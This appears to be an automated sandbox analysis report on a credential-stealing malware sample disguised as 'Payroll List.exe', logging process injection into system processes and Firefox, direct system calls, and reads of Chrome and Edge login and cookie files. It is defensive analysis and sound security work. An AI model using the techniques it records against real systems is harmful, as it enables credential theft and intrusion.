                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h] 2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h] 2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039309AD mov eax, dword ptr fs:[00000030h] 2_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h] 2_2_039649D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h] 2_2_039FA9D3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h] 2_2_039C69C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h] 2_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h] 2_2_039BE9E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h] 2_2_039BC912
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03928918 mov eax, dword ptr fs:[00000030h] 2_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h] 2_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B892A mov eax, dword ptr fs:[00000030h] 2_2_039B892A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C892B mov eax, dword ptr fs:[00000030h] 2_2_039C892B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h] 2_2_039B0946
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h] 2_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h] 2_2_039BC97C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h] 2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0397096E mov eax, dword ptr fs:[00000030h] 2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0397096E mov edx, dword ptr fs:[00000030h] 2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h] 2_2_039BC89D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03930887 mov eax, dword ptr fs:[00000030h] 2_2_03930887
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h] 2_2_0395E8C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h] 2_2_039FA8E4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h] 2_2_039BC810
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h] 2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03952835 mov ecx, dword ptr fs:[00000030h] 2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396A830 mov eax, dword ptr fs:[00000030h] 2_2_0396A830
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D483A mov eax, dword ptr fs:[00000030h] 2_2_039D483A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03960854 mov eax, dword ptr fs:[00000030h] 2_2_03960854
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03934859 mov eax, dword ptr fs:[00000030h] 2_2_03934859
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03942840 mov ecx, dword ptr fs:[00000030h] 2_2_03942840
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BE872 mov eax, dword ptr fs:[00000030h] 2_2_039BE872
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C6870 mov eax, dword ptr fs:[00000030h] 2_2_039C6870
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03962F98 mov eax, dword ptr fs:[00000030h] 2_2_03962F98
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396CF80 mov eax, dword ptr fs:[00000030h] 2_2_0396CF80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04FE7 mov eax, dword ptr fs:[00000030h] 2_2_03A04FE7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392EFD8 mov eax, dword ptr fs:[00000030h] 2_2_0392EFD8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03932FC8 mov eax, dword ptr fs:[00000030h] 2_2_03932FC8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03970FF6 mov eax, dword ptr fs:[00000030h] 2_2_03970FF6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E6FF7 mov eax, dword ptr fs:[00000030h] 2_2_039E6FF7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394CFE0 mov eax, dword ptr fs:[00000030h] 2_2_0394CFE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03932F12 mov eax, dword ptr fs:[00000030h] 2_2_03932F12
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396CF1F mov eax, dword ptr fs:[00000030h] 2_2_0396CF1F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E6F00 mov eax, dword ptr fs:[00000030h] 2_2_039E6F00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395EF28 mov eax, dword ptr fs:[00000030h] 2_2_0395EF28
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392CF50 mov eax, dword ptr fs:[00000030h] 2_2_0392CF50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396CF50 mov eax, dword ptr fs:[00000030h] 2_2_0396CF50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04F68 mov eax, dword ptr fs:[00000030h] 2_2_03A04F68
                Source: C:\Users\user\Desktop\Payroll List.exe Code function: 0_2_0015A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_0015A66C
                Source: C:\Users\user\Desktop\Payroll List.exe Code function: 0_2_00148189 SetUnhandledExceptionFilter, 0_2_00148189
                Source: C:\Users\user\Desktop\Payroll List.exe Code function: 0_2_001481AC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_001481AC

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtCreateMutant: Direct from: 0x774635CC
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtWriteVirtualMemory: Direct from: 0x77462E3C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtMapViewOfSection: Direct from: 0x77462D1C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtResumeThread: Direct from: 0x774636AC
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtProtectVirtualMemory: Direct from: 0x77462F9C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtSetInformationProcess: Direct from: 0x77462C5C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtTerminateProcess: Direct from: 0x77462D5C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtSetInformationThread: Direct from: 0x774563F9
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtNotifyChangeKey: Direct from: 0x77463C2C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtAllocateVirtualMemory: Direct from: 0x77462BFC
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtQueryInformationProcess: Direct from: 0x77462C26
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtResumeThread: Direct from: 0x77462FBC
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtReadFile: Direct from: 0x77462ADC
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtQuerySystemInformation: Direct from: 0x77462DFC
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtDelayExecution: Direct from: 0x77462DDC
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtAllocateVirtualMemory: Direct from: 0x77463C9C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtCreateUserProcess: Direct from: 0x7746371C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtWriteVirtualMemory: Direct from: 0x7746490C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtAllocateVirtualMemory: Direct from: 0x774648EC
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtQuerySystemInformation: Direct from: 0x774648CC
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtQueryVolumeInformationFile: Direct from: 0x77462F2C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtReadVirtualMemory: Direct from: 0x77462E8C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtCreateKey: Direct from: 0x77462C6C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtSetInformationThread: Direct from: 0x77462B4C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtQueryAttributesFile: Direct from: 0x77462E6C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtDeviceIoControlFile: Direct from: 0x77462AEC
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtOpenSection: Direct from: 0x77462E0C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtCreateFile: Direct from: 0x77462FEC
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtOpenFile: Direct from: 0x77462DCC
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtQueryInformationToken: Direct from: 0x77462CAC
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtTerminateThread: Direct from: 0x77462FCC
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtAllocateVirtualMemory: Direct from: 0x77462BEC
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe NtOpenKeyEx: Direct from: 0x77462B9C
                Source: C:\Users\user\Desktop\Payroll List.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\ktmutil.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeThread register set: target process: 7372Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeThread APC queued: target process: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeJump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EB1008Jump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015B106 LogonUserW,0_2_0015B106
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00123D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00123D19
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0016411C SendInput,keybd_event,0_2_0016411C
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001674BB mouse_event,0_2_001674BB
                Source: C:\Users\user\Desktop\Payroll List.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payroll List.exe"Jump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeProcess created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"Jump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0015A66C
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001671FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_001671FA
                Source: Payroll List.exe, eLiCpwzRIeWAs.exe, 00000004.00000000.1656587643.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000004.00000002.3292145094.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292344981.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: eLiCpwzRIeWAs.exe, 00000004.00000000.1656587643.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000004.00000002.3292145094.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292344981.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: eLiCpwzRIeWAs.exe, 00000004.00000000.1656587643.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000004.00000002.3292145094.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292344981.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: Payroll List.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: eLiCpwzRIeWAs.exe, 00000004.00000000.1656587643.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000004.00000002.3292145094.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292344981.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001465C4 cpuid 0_2_001465C4
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0017091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0017091D
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0019B340 GetUserNameW,0_2_0019B340
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00151E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00151E8E
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0013DDC0

                Stealing of Sensitive Information

                Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000002.00000002.1734177353.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.1733855292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3292196090.0000000002900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3291497446.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.3292524183.0000000004FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3291358467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.3295460520.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.1734536564.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\ktmutil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: Payroll List.exe Binary or memory string: WIN_81
                Source: Payroll List.exe Binary or memory string: WIN_XP
                Source: Payroll List.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: Payroll List.exe Binary or memory string: WIN_XPe
                Source: Payroll List.exe Binary or memory string: WIN_VISTA
                Source: Payroll List.exe Binary or memory string: WIN_7
                Source: Payroll List.exe Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000002.00000002.1734177353.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.1733855292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3292196090.0000000002900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3291497446.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.3292524183.0000000004FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3291358467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.3295460520.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.1734536564.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Payroll List.exe Code function: 0_2_00178C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00178C4F
                Source: C:\Users\user\Desktop\Payroll List.exe Code function: 0_2_0017923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0017923B
                MITRE ATT&CK Matrix (numbers in brackets are the counts shown on the matched cells)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | [2] Valid Accounts | [3] Native API | [1] DLL Side-Loading | [1] Exploitation for Privilege Escalation | [1] Disable or Modify Tools | [1] OS Credential Dumping | [2] System Time Discovery | Remote Services | [1] Archive Collected Data | [5] Ingress Tool Transfer | Exfiltration Over Other Network Medium | [1] System Shutdown/Reboot
                Credentials | Domains | Default Accounts | Scheduled Task/Job | [2] Valid Accounts | [1] Abuse Elevation Control Mechanism | [1] Deobfuscate/Decode Files or Information | [21] Input Capture | [1] Account Discovery | Remote Desktop Protocol | [1] Data from Local System | [1] Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | [1] DLL Side-Loading | [1] Abuse Elevation Control Mechanism | Security Account Manager | [2] File and Directory Discovery | SMB/Windows Admin Shares | [1] Email Collection | [5] Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | [2] Valid Accounts | [3] Obfuscated Files or Information | NTDS | [116] System Information Discovery | Distributed Component Object Model | [21] Input Capture | [5] Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | [21] Access Token Manipulation | [1] DLL Side-Loading | LSA Secrets | [151] Security Software Discovery | SSH | [3] Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
